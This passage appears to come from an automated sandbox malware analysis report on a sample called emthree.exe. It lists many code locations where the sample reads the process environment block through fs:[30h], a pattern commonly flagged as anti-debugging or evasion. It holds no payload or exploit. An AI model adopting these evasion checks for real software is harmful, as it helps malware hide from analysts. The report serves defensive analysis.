Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A830 mov eax, dword ptr fs:[00000030h]	1_2_0100A830
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A830 mov eax, dword ptr fs:[00000030h]	1_2_0100A830
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01000050 mov eax, dword ptr fs:[00000030h]	1_2_01000050
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01000050 mov eax, dword ptr fs:[00000030h]	1_2_01000050
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A2073 mov eax, dword ptr fs:[00000030h]	1_2_010A2073
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B1074 mov eax, dword ptr fs:[00000030h]	1_2_010B1074
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01063884 mov eax, dword ptr fs:[00000030h]	1_2_01063884
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01063884 mov eax, dword ptr fs:[00000030h]	1_2_01063884
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FEB171 mov eax, dword ptr fs:[00000030h]	1_2_00FEB171
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FEB171 mov eax, dword ptr fs:[00000030h]	1_2_00FEB171
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FEC962 mov eax, dword ptr fs:[00000030h]	1_2_00FEC962
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010120A0 mov eax, dword ptr fs:[00000030h]	1_2_010120A0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010120A0 mov eax, dword ptr fs:[00000030h]	1_2_010120A0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010120A0 mov eax, dword ptr fs:[00000030h]	1_2_010120A0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010120A0 mov eax, dword ptr fs:[00000030h]	1_2_010120A0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010120A0 mov eax, dword ptr fs:[00000030h]	1_2_010120A0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010120A0 mov eax, dword ptr fs:[00000030h]	1_2_010120A0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010290AF mov eax, dword ptr fs:[00000030h]	1_2_010290AF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101F0BF mov ecx, dword ptr fs:[00000030h]	1_2_0101F0BF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101F0BF mov eax, dword ptr fs:[00000030h]	1_2_0101F0BF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101F0BF mov eax, dword ptr fs:[00000030h]	1_2_0101F0BF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0107B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0107B8D0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0107B8D0 mov ecx, dword ptr fs:[00000030h]	1_2_0107B8D0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0107B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0107B8D0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0107B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0107B8D0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0107B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0107B8D0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0107B8D0 mov eax, dword ptr fs:[00000030h]	1_2_0107B8D0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100B8E4 mov eax, dword ptr fs:[00000030h]	1_2_0100B8E4
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100B8E4 mov eax, dword ptr fs:[00000030h]	1_2_0100B8E4
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE9100 mov eax, dword ptr fs:[00000030h]	1_2_00FE9100
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE9100 mov eax, dword ptr fs:[00000030h]	1_2_00FE9100
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE9100 mov eax, dword ptr fs:[00000030h]	1_2_00FE9100
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]	1_2_0100A309
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]	1_2_0100A309
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]	1_2_0100A309
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]	1_2_0100A309
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]	1_2_0100A309
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]	1_2_0100A309
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]	1_2_0100A309
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]	1_2_0100A309
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]	1_2_0100A309
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]	1_2_0100A309
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]	1_2_0100A309
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]	1_2_0100A309
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]	1_2_0100A309
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]	1_2_0100A309
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]	1_2_0100A309
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]	1_2_0100A309
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]	1_2_0100A309
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]	1_2_0100A309
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]	1_2_0100A309
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]	1_2_0100A309
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]	1_2_0100A309
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A131B mov eax, dword ptr fs:[00000030h]	1_2_010A131B
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FFAAB0 mov eax, dword ptr fs:[00000030h]	1_2_00FFAAB0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FFAAB0 mov eax, dword ptr fs:[00000030h]	1_2_00FFAAB0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B8B58 mov eax, dword ptr fs:[00000030h]	1_2_010B8B58
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE52A5 mov eax, dword ptr fs:[00000030h]	1_2_00FE52A5
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE52A5 mov eax, dword ptr fs:[00000030h]	1_2_00FE52A5
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE52A5 mov eax, dword ptr fs:[00000030h]	1_2_00FE52A5
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE52A5 mov eax, dword ptr fs:[00000030h]	1_2_00FE52A5
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE52A5 mov eax, dword ptr fs:[00000030h]	1_2_00FE52A5
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01013B7A mov eax, dword ptr fs:[00000030h]	1_2_01013B7A
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01013B7A mov eax, dword ptr fs:[00000030h]	1_2_01013B7A
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A138A mov eax, dword ptr fs:[00000030h]	1_2_010A138A
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0109D380 mov ecx, dword ptr fs:[00000030h]	1_2_0109D380
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101B390 mov eax, dword ptr fs:[00000030h]	1_2_0101B390
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01012397 mov eax, dword ptr fs:[00000030h]	1_2_01012397
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01014BAD mov eax, dword ptr fs:[00000030h]	1_2_01014BAD
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01014BAD mov eax, dword ptr fs:[00000030h]	1_2_01014BAD
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01014BAD mov eax, dword ptr fs:[00000030h]	1_2_01014BAD
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B5BA5 mov eax, dword ptr fs:[00000030h]	1_2_010B5BA5
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE9240 mov eax, dword ptr fs:[00000030h]	1_2_00FE9240
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE9240 mov eax, dword ptr fs:[00000030h]	1_2_00FE9240
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE9240 mov eax, dword ptr fs:[00000030h]	1_2_00FE9240
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE9240 mov eax, dword ptr fs:[00000030h]	1_2_00FE9240
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010653CA mov eax, dword ptr fs:[00000030h]	1_2_010653CA
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010653CA mov eax, dword ptr fs:[00000030h]	1_2_010653CA
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010103E2 mov eax, dword ptr fs:[00000030h]	1_2_010103E2
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010103E2 mov eax, dword ptr fs:[00000030h]	1_2_010103E2
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010103E2 mov eax, dword ptr fs:[00000030h]	1_2_010103E2
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010103E2 mov eax, dword ptr fs:[00000030h]	1_2_010103E2
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010103E2 mov eax, dword ptr fs:[00000030h]	1_2_010103E2
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010103E2 mov eax, dword ptr fs:[00000030h]	1_2_010103E2
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FEAA16 mov eax, dword ptr fs:[00000030h]	1_2_00FEAA16
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FEAA16 mov eax, dword ptr fs:[00000030h]	1_2_00FEAA16
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100DBE9 mov eax, dword ptr fs:[00000030h]	1_2_0100DBE9
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010923E3 mov ecx, dword ptr fs:[00000030h]	1_2_010923E3
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010923E3 mov ecx, dword ptr fs:[00000030h]	1_2_010923E3
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010923E3 mov eax, dword ptr fs:[00000030h]	1_2_010923E3
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE5210 mov eax, dword ptr fs:[00000030h]	1_2_00FE5210
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE5210 mov ecx, dword ptr fs:[00000030h]	1_2_00FE5210
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE5210 mov eax, dword ptr fs:[00000030h]	1_2_00FE5210
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE5210 mov eax, dword ptr fs:[00000030h]	1_2_00FE5210
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF8A0A mov eax, dword ptr fs:[00000030h]	1_2_00FF8A0A
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01003A1C mov eax, dword ptr fs:[00000030h]	1_2_01003A1C
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010AAA16 mov eax, dword ptr fs:[00000030h]	1_2_010AAA16
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010AAA16 mov eax, dword ptr fs:[00000030h]	1_2_010AAA16
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A229 mov eax, dword ptr fs:[00000030h]	1_2_0100A229
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A229 mov eax, dword ptr fs:[00000030h]	1_2_0100A229
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A229 mov eax, dword ptr fs:[00000030h]	1_2_0100A229
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A229 mov eax, dword ptr fs:[00000030h]	1_2_0100A229
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A229 mov eax, dword ptr fs:[00000030h]	1_2_0100A229
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A229 mov eax, dword ptr fs:[00000030h]	1_2_0100A229
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A229 mov eax, dword ptr fs:[00000030h]	1_2_0100A229
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A229 mov eax, dword ptr fs:[00000030h]	1_2_0100A229
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A229 mov eax, dword ptr fs:[00000030h]	1_2_0100A229
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01024A2C mov eax, dword ptr fs:[00000030h]	1_2_01024A2C
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01024A2C mov eax, dword ptr fs:[00000030h]	1_2_01024A2C
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01074257 mov eax, dword ptr fs:[00000030h]	1_2_01074257
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010AEA55 mov eax, dword ptr fs:[00000030h]	1_2_010AEA55
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0109B260 mov eax, dword ptr fs:[00000030h]	1_2_0109B260
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0109B260 mov eax, dword ptr fs:[00000030h]	1_2_0109B260
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B8A62 mov eax, dword ptr fs:[00000030h]	1_2_010B8A62
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF1B8F mov eax, dword ptr fs:[00000030h]	1_2_00FF1B8F
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF1B8F mov eax, dword ptr fs:[00000030h]	1_2_00FF1B8F
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0102927A mov eax, dword ptr fs:[00000030h]	1_2_0102927A
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101D294 mov eax, dword ptr fs:[00000030h]	1_2_0101D294
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101D294 mov eax, dword ptr fs:[00000030h]	1_2_0101D294
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FEDB60 mov ecx, dword ptr fs:[00000030h]	1_2_00FEDB60
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FEF358 mov eax, dword ptr fs:[00000030h]	1_2_00FEF358
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101FAB0 mov eax, dword ptr fs:[00000030h]	1_2_0101FAB0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FEDB40 mov eax, dword ptr fs:[00000030h]	1_2_00FEDB40
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01012ACB mov eax, dword ptr fs:[00000030h]	1_2_01012ACB
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01012AE4 mov eax, dword ptr fs:[00000030h]	1_2_01012AE4
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]	1_2_010A4AEF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]	1_2_010A4AEF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]	1_2_010A4AEF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]	1_2_010A4AEF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]	1_2_010A4AEF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]	1_2_010A4AEF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]	1_2_010A4AEF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]	1_2_010A4AEF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]	1_2_010A4AEF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]	1_2_010A4AEF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]	1_2_010A4AEF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]	1_2_010A4AEF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]	1_2_010A4AEF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]	1_2_010A4AEF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0106A537 mov eax, dword ptr fs:[00000030h]	1_2_0106A537
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010AE539 mov eax, dword ptr fs:[00000030h]	1_2_010AE539
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01014D3B mov eax, dword ptr fs:[00000030h]	1_2_01014D3B
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01014D3B mov eax, dword ptr fs:[00000030h]	1_2_01014D3B
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01014D3B mov eax, dword ptr fs:[00000030h]	1_2_01014D3B
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B8D34 mov eax, dword ptr fs:[00000030h]	1_2_010B8D34
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01023D43 mov eax, dword ptr fs:[00000030h]	1_2_01023D43
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01063540 mov eax, dword ptr fs:[00000030h]	1_2_01063540
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01093D40 mov eax, dword ptr fs:[00000030h]	1_2_01093D40
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01007D50 mov eax, dword ptr fs:[00000030h]	1_2_01007D50
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF849B mov eax, dword ptr fs:[00000030h]	1_2_00FF849B
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100C577 mov eax, dword ptr fs:[00000030h]	1_2_0100C577
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100C577 mov eax, dword ptr fs:[00000030h]	1_2_0100C577
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01012581 mov eax, dword ptr fs:[00000030h]	1_2_01012581
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01012581 mov eax, dword ptr fs:[00000030h]	1_2_01012581
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01012581 mov eax, dword ptr fs:[00000030h]	1_2_01012581
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01012581 mov eax, dword ptr fs:[00000030h]	1_2_01012581
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101FD9B mov eax, dword ptr fs:[00000030h]	1_2_0101FD9B
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101FD9B mov eax, dword ptr fs:[00000030h]	1_2_0101FD9B
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010135A1 mov eax, dword ptr fs:[00000030h]	1_2_010135A1
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B05AC mov eax, dword ptr fs:[00000030h]	1_2_010B05AC
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B05AC mov eax, dword ptr fs:[00000030h]	1_2_010B05AC
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01011DB5 mov eax, dword ptr fs:[00000030h]	1_2_01011DB5
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01011DB5 mov eax, dword ptr fs:[00000030h]	1_2_01011DB5
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01011DB5 mov eax, dword ptr fs:[00000030h]	1_2_01011DB5
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01066DC9 mov eax, dword ptr fs:[00000030h]	1_2_01066DC9
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01066DC9 mov eax, dword ptr fs:[00000030h]	1_2_01066DC9
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01066DC9 mov eax, dword ptr fs:[00000030h]	1_2_01066DC9
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01066DC9 mov ecx, dword ptr fs:[00000030h]	1_2_01066DC9
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01066DC9 mov eax, dword ptr fs:[00000030h]	1_2_01066DC9
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01066DC9 mov eax, dword ptr fs:[00000030h]	1_2_01066DC9
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010AFDE2 mov eax, dword ptr fs:[00000030h]	1_2_010AFDE2
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010AFDE2 mov eax, dword ptr fs:[00000030h]	1_2_010AFDE2
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010AFDE2 mov eax, dword ptr fs:[00000030h]	1_2_010AFDE2
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010AFDE2 mov eax, dword ptr fs:[00000030h]	1_2_010AFDE2
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01098DF1 mov eax, dword ptr fs:[00000030h]	1_2_01098DF1
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B740D mov eax, dword ptr fs:[00000030h]	1_2_010B740D
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B740D mov eax, dword ptr fs:[00000030h]	1_2_010B740D
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B740D mov eax, dword ptr fs:[00000030h]	1_2_010B740D
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]	1_2_010A1C06
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]	1_2_010A1C06
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]	1_2_010A1C06
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]	1_2_010A1C06
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]	1_2_010A1C06
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]	1_2_010A1C06
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]	1_2_010A1C06
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]	1_2_010A1C06
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]	1_2_010A1C06
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]	1_2_010A1C06
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]	1_2_010A1C06
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]	1_2_010A1C06
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]	1_2_010A1C06
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]	1_2_010A1C06
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01066C0A mov eax, dword ptr fs:[00000030h]	1_2_01066C0A
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01066C0A mov eax, dword ptr fs:[00000030h]	1_2_01066C0A
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01066C0A mov eax, dword ptr fs:[00000030h]	1_2_01066C0A
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01066C0A mov eax, dword ptr fs:[00000030h]	1_2_01066C0A
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FFD5E0 mov eax, dword ptr fs:[00000030h]	1_2_00FFD5E0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FFD5E0 mov eax, dword ptr fs:[00000030h]	1_2_00FFD5E0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101BC2C mov eax, dword ptr fs:[00000030h]	1_2_0101BC2C
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101A44B mov eax, dword ptr fs:[00000030h]	1_2_0101A44B
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0107C450 mov eax, dword ptr fs:[00000030h]	1_2_0107C450
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0107C450 mov eax, dword ptr fs:[00000030h]	1_2_0107C450
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100746D mov eax, dword ptr fs:[00000030h]	1_2_0100746D
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE2D8A mov eax, dword ptr fs:[00000030h]	1_2_00FE2D8A
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE2D8A mov eax, dword ptr fs:[00000030h]	1_2_00FE2D8A
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE2D8A mov eax, dword ptr fs:[00000030h]	1_2_00FE2D8A
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE2D8A mov eax, dword ptr fs:[00000030h]	1_2_00FE2D8A
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE2D8A mov eax, dword ptr fs:[00000030h]	1_2_00FE2D8A
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]	1_2_0101AC7B
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]	1_2_0101AC7B
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]	1_2_0101AC7B
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]	1_2_0101AC7B
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]	1_2_0101AC7B
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]	1_2_0101AC7B
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]	1_2_0101AC7B
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]	1_2_0101AC7B
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]	1_2_0101AC7B
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]	1_2_0101AC7B
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]	1_2_0101AC7B
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]	1_2_010A4496
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]	1_2_010A4496
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]	1_2_010A4496
